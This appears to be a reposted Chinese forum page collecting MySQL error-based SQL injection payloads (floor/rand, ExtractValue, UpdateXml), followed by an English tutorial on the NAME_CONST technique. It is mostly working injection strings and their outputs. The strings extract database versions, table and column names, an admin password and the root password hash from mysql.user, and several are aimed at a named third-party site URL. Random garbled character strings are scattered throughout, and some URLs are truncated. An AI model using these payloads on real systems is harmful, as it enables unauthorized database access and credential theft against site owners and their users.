mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

admin

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下：
8 W* u4 t; j; Q- Q2 p, J" \首先进行正常查询：

mysql> select * from article where id = 1;
+—-+——-+———+
9 v% ^/ M. j2 b| id | title | content |
2 A$ L2 s0 i' k  }+—-+——-+———+
|  1 | test  | do it   |
+—-+——-+———+

假如id输入存在注入的话，可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本，如果需要查询其他数据，可以通过修改version()所在位置语句进行查询。
例如我们需要查询管理员用户名和密码：

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
( V8 d# U4 Z' i& I) j4 e% t- ?ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
+ Z  a" F4 N5 h5 }ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue
& D7 w7 I% O) ~& B& g8 c3 z测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
0 g$ A) ^- z) x& AERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

# z6 n* ]8 \+ M; ~6 v" _
; H& U2 H2 ~6 Q' W$ y. @

再收集：

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
, z2 i  r" M% y! S
1 N/ u# g3 b1 ~Erroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’

6 `- P' Q9 k( qhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
  h: `6 S" n, F/ f
, }. E, ]1 L0 h+ ]* K1 ^Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′

% g0 a7 T1 m! i. P7 fMYSQL高版本报错注入技巧-利用NAME_CONST注入
' Q+ |3 p; o( |! x! xIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
! x$ p& K0 \! b! x+ O

相关信息
; R2 x4 U; t  {' g5 G8 U0 V4 Q9 h
0 t& Z" d- F+ K7 bNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
# S' U) f% Q7 u! \: a( Z
Code:
! B+ ?) e8 d+ B/ S* q( wNAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
; @- o5 K* r; I5 l  L+ g9 m
% q9 Q, K" D+ w: t6 N+ ~7 q3 ~SELECT NAME_CONST('TEST', 1)
7 r' n0 a, }: X9 t


|---------------|
|     TEST      |
" O3 y0 N$ n0 {6 s|               |
|---------------|
|       1       |
|               |
& \( z& j# u8 w3 t2 \6 w|---------------|
2 T" ?: d8 G% L& c, g

4 K$ A& V+ X: c0 R8 B) m! F6 G$ V

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables
- j& s. a4 J. B* ^9 ^
% T4 Y  B9 w! k) P  w$ E+ nOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

+ R# j5 u! [# @1 c3 p# ^

6 \7 H. Z/ b8 n. B  k2 g
4 U: F3 N0 O% ]7 S2 M) S. @% v5 U( C6 W
' ^0 G8 q3 i5 U' X" P8 aCode:
+ k& h% n+ h8 {, A- Y; Jand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

% k7 {* i( p. t# k5 l2 l
$ N+ R( q' ]( A0 o9 V" xVAR = Your MySQL variable.

% u$ l9 X- B' \MySQL 5.1.3 Server System Variables

Let's try it out on my site..
8 \" J% S0 u' P2 F$ l" r
" i$ y! ]' ?5 B9 x2 |Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Erroruplicate column name '5.0.27-community-nt'

2 M  J( i5 A8 @. P- T* e



/ D+ |/ p) }& X+ i- _  K: {6 R1 rNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...

8 ], h3 S5 Z+ L  YData Extraction

' J2 Y* J0 S: Y/ W, e0 R1 ^Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
" a1 |1 e" Q; P& W$ \
2 Z! x0 ], U, I7 S3 ]7 L2 V+ c; o
We should get a duplicate column 1 error...
- {/ i; a" T! s$ H% y6 V3 ?# X' S3 \
Code:
# c. [5 g( O1 Y' p2 phttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
, \) P% V" ]1 t
8 c1 ?3 }( [1 @; e% ]Erroruplicate column name '1
' R6 W+ B$ n& y
% C6 A0 o2 ^' B3 }: g. F& r6 Y


/ F! l/ f; b0 C, e

Now let's get the tables out this bitch..
. `* W3 ?/ T& V6 [. v
Code:
/ k% C$ w, D+ U  t& k+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

. V  x* V' t  F! N
( F: }8 \$ o7 q+ ^Let's see if it works here, if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

$ ^7 H+ }7 N7 Y" q, k
  R8 w4 P4 o: T7 H4 s% Y- PErroruplicate column name 'com_admanage

& G4 x7 T- ], M. t

+ S( ~# {; t3 m' m; O3 V! b# Z6 u
8 o3 b: M. o, a7 ^' i5 q
0 R4 R! T0 x1 y; o
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

% j. [( V9 l- j  l5 E* ELet's get the columns out of the user table..
; {1 e4 n/ ?2 M8 h) E. o8 ~/ _
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--


So mine looks like this, and I get the duplicate column name 'Host'.
( J& g+ W# h8 }
Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

# ?- a- ^$ \6 \, }& g2 _) wErroruplicate column name 'Host'



" ~) d' ?2 n" E  ^# _  f


Woot, time to finish this bitch off.
  M7 w  _" f" m% _$ F7 m
Code:
8 Y9 z* \% U& l( G2 h+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
& r8 o( ?6 Q; }; I. n
; f. S1 g" @% M* N* f4 a
& H( D7 Y7 J) F4 VSo mine looks like this...

, \+ x  p* h, _9 I3 Y, p8 C( B% ?Code:
! F. `& u$ V5 ~2 Phttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
: [8 x8 E: W( L6 l
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'


+ O) M2 z# B2 e7 p. H. X+ W$ w. Y
" H& f) |. W9 s0 f+ G* A
5 @  C. P2 h! k: a. ^  i2 L
4 s- P; `0 W5 u7 I
And there we have it, thanks for reading.
8 [$ W  ], U- ^0 a' n, P8 l